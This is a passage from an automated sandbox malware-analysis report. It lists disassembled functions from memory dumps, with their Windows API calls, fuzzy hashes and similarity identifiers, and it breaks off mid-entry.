                                                                                                                                                                                                                                                        • Instruction ID: 936c805cc19986a8002a8d3beda24fa8019a28da48c10732d13ccb40fe84a120
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2feed64a3656b14c358cf92e64dc7ae8e82efb5165160346c726e3061829813c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17A1363B9043879FE752CE28C891BAAFBB5EF55350F1E81ADD486DF281C2399941CB50
                                                                                                                                                                                                                                                        Function 73CFFAC4 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,73CF93CC,?,00000000,?,00000001,?,?,00000001,73CF93CC,?), ref: 73CFFB11
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 73CFFB9A
                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,73CF8585,?), ref: 73CFFBAC
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 73CFFBB5
                                                                                                                                                                                                                                                          • Part of subcall function 73CF8389: HeapAlloc.KERNEL32(00000000,?,?,?,73CFAC07,00001000,?,?,73CF7182,?,73CF507C), ref: 73CF83BB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 573072132-0
                                                                                                                                                                                                                                                        • Opcode ID: 01e363d16e43b81574d56933dd30a497e9b8ae29bc4869a58c66b3d692747d36
                                                                                                                                                                                                                                                        • Instruction ID: d275f96d69d3c3c691ac84ba494017d271f04e24a6bdd57db55b9745a83e92f2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01e363d16e43b81574d56933dd30a497e9b8ae29bc4869a58c66b3d692747d36
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8231EF73A0121BAFDF158F65CC94FAE3BB9EB00610F154169EC0ADB290EB35D850CBA0
                                                                                                                                                                                                                                                        Function 73CFCB7C Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 73CFCB85
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 73CFCBA8
                                                                                                                                                                                                                                                          • Part of subcall function 73CF8389: HeapAlloc.KERNEL32(00000000,?,?,?,73CFAC07,00001000,?,?,73CF7182,?,73CF507C), ref: 73CF83BB
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 73CFCBCE
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 73CFCBF0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1993637811-0
                                                                                                                                                                                                                                                        • Opcode ID: 6e8db87626e24e0eeea024e63aed696b33456c312bac38754d192dfbba485908
                                                                                                                                                                                                                                                        • Instruction ID: 6de49fd4800cde745b79aa0f50e1bbde82c409eb386499441255e44e6eac2613
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e8db87626e24e0eeea024e63aed696b33456c312bac38754d192dfbba485908
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF01247BB853177FB3511AB70D8CEBB297DCAC2EA03154129B909C6144DF608C0281B0
                                                                                                                                                                                                                                                        Function 73CFBA32 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,73CF10F2,00000000,00000000,?,73CFB9D9,73CF10F2,00000000,00000000,00000000,?,73CFBC24,00000006,FlsSetValue), ref: 73CFBA64
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,73CFB9D9,73CF10F2,00000000,00000000,00000000,?,73CFBC24,00000006,FlsSetValue,73D0779C,73D077A4,00000000,00000364,?,73CF9D9F), ref: 73CFBA70
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,73CFB9D9,73CF10F2,00000000,00000000,00000000,?,73CFBC24,00000006,FlsSetValue,73D0779C,73D077A4,00000000), ref: 73CFBA7E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                        • Opcode ID: 6fdeeb9e159215c5914e1306b8542fa934e8081bdda34f2222bffaf5ae0f51a1
                                                                                                                                                                                                                                                        • Instruction ID: 026334aab1e9ab1d1023c1ef6da77c5571d5cb3fc716366be05e065d8dcf9620
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fdeeb9e159215c5914e1306b8542fa934e8081bdda34f2222bffaf5ae0f51a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C201A7337516239FC76299BACC44B467FACEF45FA57251720F90BDB180D720D81186E4
                                                                                                                                                                                                                                                        Function 73CF9CCD Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,73D00396,00000010,73CF1034,73D0BAE0,?,73D0087A,73CF1034,73CF1034,?,73CF1034,?,73CF7259,73CF1034), ref: 73CF9CD1
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,73CF1034,?,73CF1034,?,73CF7259,73CF1034), ref: 73CF9D39
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,73CF1034,?,73CF1034,?,73CF7259,73CF1034), ref: 73CF9D45
                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 73CF9D4B
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 88804580-0
                                                                                                                                                                                                                                                        • Opcode ID: cc56a01e5cb65065391342d42c96143a5dc9646623ffb27cbae6732993c6a588
                                                                                                                                                                                                                                                        • Instruction ID: c1df33873b3d9136a88f44da249808d9e54a05c61a8af3c548a4a766721e7fc3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc56a01e5cb65065391342d42c96143a5dc9646623ffb27cbae6732993c6a588
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F0A4332447032BEB82227ADD14F4B267E9FC1B66B3A0154F519EA1D8EF21C8454561
                                                                                                                                                                                                                                                        Function 73CF3F06 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 73CF3F06
                                                                                                                                                                                                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 73CF3F0B
                                                                                                                                                                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 73CF3F10
                                                                                                                                                                                                                                                          • Part of subcall function 73CF4380: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 73CF4391
                                                                                                                                                                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 73CF3F25
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1761009282-0
                                                                                                                                                                                                                                                        • Opcode ID: cff6271ce2fcaee87cb2561fe6ffc52cce4b05a4d107bfcd4f74eb29c87db949
                                                                                                                                                                                                                                                        • Instruction ID: 9a22feb65585d1f0c0947fb976ece9ebdbc3a6244cd1115e5b715a84d6a05302
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cff6271ce2fcaee87cb2561fe6ffc52cce4b05a4d107bfcd4f74eb29c87db949
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93C04C27000323B3FDD23BB13610B9E13750D421C97DB14C5C951DF5415A07800F5477
                                                                                                                                                                                                                                                        Function 73CF1540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1470: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 73CF14AD
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF1590
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 73CF15F2
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree__vfwprintf_l_fwprintf
                                                                                                                                                                                                                                                        • String ID: Unable to get App name
                                                                                                                                                                                                                                                        • API String ID: 3671585790-1516077376
                                                                                                                                                                                                                                                        • Opcode ID: a2dda610ef575cbb392f2e72338c9480f5e3ea31ba42c02b7a8123ba85fb155a
                                                                                                                                                                                                                                                        • Instruction ID: bd0b71875cc4b8b98da9fd7320b9128a22d6b22642acb0f57a6790c9785ac428
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2dda610ef575cbb392f2e72338c9480f5e3ea31ba42c02b7a8123ba85fb155a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E02130B6E00209FFDB40DFD4DC45BAE77B8AB48304F148558E506AB380D7769A44CF91

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC5B1739 Relevance: .8, Instructions: 797COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a2685f89bec1c83154e824fdad3c56560ff143b1955ed592b6f46c14464e4e0d
                                                                                                                                                                                                                                                        • Instruction ID: 295194996b10b9847151d223d0ed9a0f0ed223737457e5a2391bcf571ccd7926
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2685f89bec1c83154e824fdad3c56560ff143b1955ed592b6f46c14464e4e0d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F442AAA1F59A4A4FE794E778C459B797BD6FF99300F448579E00EC3293DE28A8058381
                                                                                                                                                                                                                                                        Function 00007FFAAC5B2161 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 245cfac133b026ed1f52a17a701d93e440705ccc449b18abcdb5f97ee5e1f98c
                                                                                                                                                                                                                                                        • Instruction ID: 2420c63d235d08a09b36038624f50c895169b45d43cd7dc9c3700845aa2bce56
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 245cfac133b026ed1f52a17a701d93e440705ccc449b18abcdb5f97ee5e1f98c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1513251A5E6C64FE786A73898646B5BFD8EF47225B1804FBE0CDC71A3ED084846C392
                                                                                                                                                                                                                                                        Function 00007FFAAC5B05FA Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 41dade2f0e604b6d5550e1bb1e426caa78b80823a35236e5b0195de3558fb410
                                                                                                                                                                                                                                                        • Instruction ID: 0685387df8c44f2483b63f37bc55b0d44efbd6787fa4e5a8d37fc8d8a83deb0a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41dade2f0e604b6d5550e1bb1e426caa78b80823a35236e5b0195de3558fb410
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72B12DA3A8E6868FE341976CE8655F97F90EF82311B58C0BBD08DC7293ED14944AC3C1
                                                                                                                                                                                                                                                        Function 00007FFAAC5B0705 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d720bdadf56b4e639bfaed6408552a286faf4f07f8442fa35398194563710e9
                                                                                                                                                                                                                                                        • Instruction ID: 68da52f4856fa85bae610a8c603f44175622c32c396372fbfab8cbded087a991
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d720bdadf56b4e639bfaed6408552a286faf4f07f8442fa35398194563710e9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB812BA2A8E6864FE345A76CD8619E97FA1EF91310B48C0BBE08DC7397DD149849C7C1
                                                                                                                                                                                                                                                        Function 00007FFAAC5B0EAE Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ea9080e608c8960c32a95895191892d22ed25e3a0f081363746de3c1a367bd61
                                                                                                                                                                                                                                                        • Instruction ID: b4c85bce03fb3a25ea81106e4f0aa4cec2dd99df18435ecc8765b15a0fea8b6c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea9080e608c8960c32a95895191892d22ed25e3a0f081363746de3c1a367bd61
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98512862A4D6864FE356A73CD8665B53FD5EF87220B0984FBE08DC71A3DC1898468392
                                                                                                                                                                                                                                                        Function 00007FFAAC5B0650 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 28141dd12081e9f83d2372422849d47b79c1435aac076aab7502128ea14f21fd
                                                                                                                                                                                                                                                        • Instruction ID: ec28fb7049761376367e69f2008534f1554fe7706cd3fe95867bb7e20e0321c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28141dd12081e9f83d2372422849d47b79c1435aac076aab7502128ea14f21fd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47319662B189490FE798F73CD86A679B7C5EF9D311F1445BAE04EC32A3DD549C428381
                                                                                                                                                                                                                                                        Function 00007FFAAC5B0D41 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d1f681e7b46b31f379b73dbd9ae8a78771cc2b096d02b38ebbea2f3e4db1145f
                                                                                                                                                                                                                                                        • Instruction ID: 8f97b9ba1d93cc6c82d5573c23cd37760f2003c2351a8af7d84cdacb75d35312
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1f681e7b46b31f379b73dbd9ae8a78771cc2b096d02b38ebbea2f3e4db1145f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D319592B5CA4A5FF744B7BC981A7B97BD5EB99311F0481B6E00DC3293DD2898054381
                                                                                                                                                                                                                                                        Function 00007FFAAC5B0BFB Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4c8249a0bac061fb5bb32aab0763c6d4895889609e87aa77bc3dc504cce4d88f
                                                                                                                                                                                                                                                        • Instruction ID: 45ca60eeb2b272d631b3ca6c69be3926d92d8ab8b3eefb8f1381e1a977df2525
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c8249a0bac061fb5bb32aab0763c6d4895889609e87aa77bc3dc504cce4d88f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 603184B1E5890E8BEB44EB78C455AE9BBE1FF98301F908579D009D3392DE38A845C781
                                                                                                                                                                                                                                                        Function 00007FFAAC5B0870 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 259a70a5ce54154c775cf0e82df7f3012664069060e36a1fccbc796ea8713cff
                                                                                                                                                                                                                                                        • Instruction ID: 8624641c4bbc5b413640aff59a523d75255c59af0f6f77039fc8fe5a05f04506
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 259a70a5ce54154c775cf0e82df7f3012664069060e36a1fccbc796ea8713cff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75318161A9D68D4FD780EB2CD4A0DA97FB2BF88300FC5C4B5D00AC77A6CE246905C782
                                                                                                                                                                                                                                                        Function 00007FFAAC5B1652 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 95534383884120c60877aec27b45c8a191f513e75cb013c0f9b02713a2480750
                                                                                                                                                                                                                                                        • Instruction ID: 0ce534afb106e60742603d801c24b3dd1300af2aa3fb317e4d930b7866dc431a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95534383884120c60877aec27b45c8a191f513e75cb013c0f9b02713a2480750
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2311B461E5890B8AEB84E75CD8565FEBBB1FF55350F808135E00FE3696DE242C0A87C0
                                                                                                                                                                                                                                                        Function 00007FFAAC5B2331 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001C.00000002.2986189816.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac5b0000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
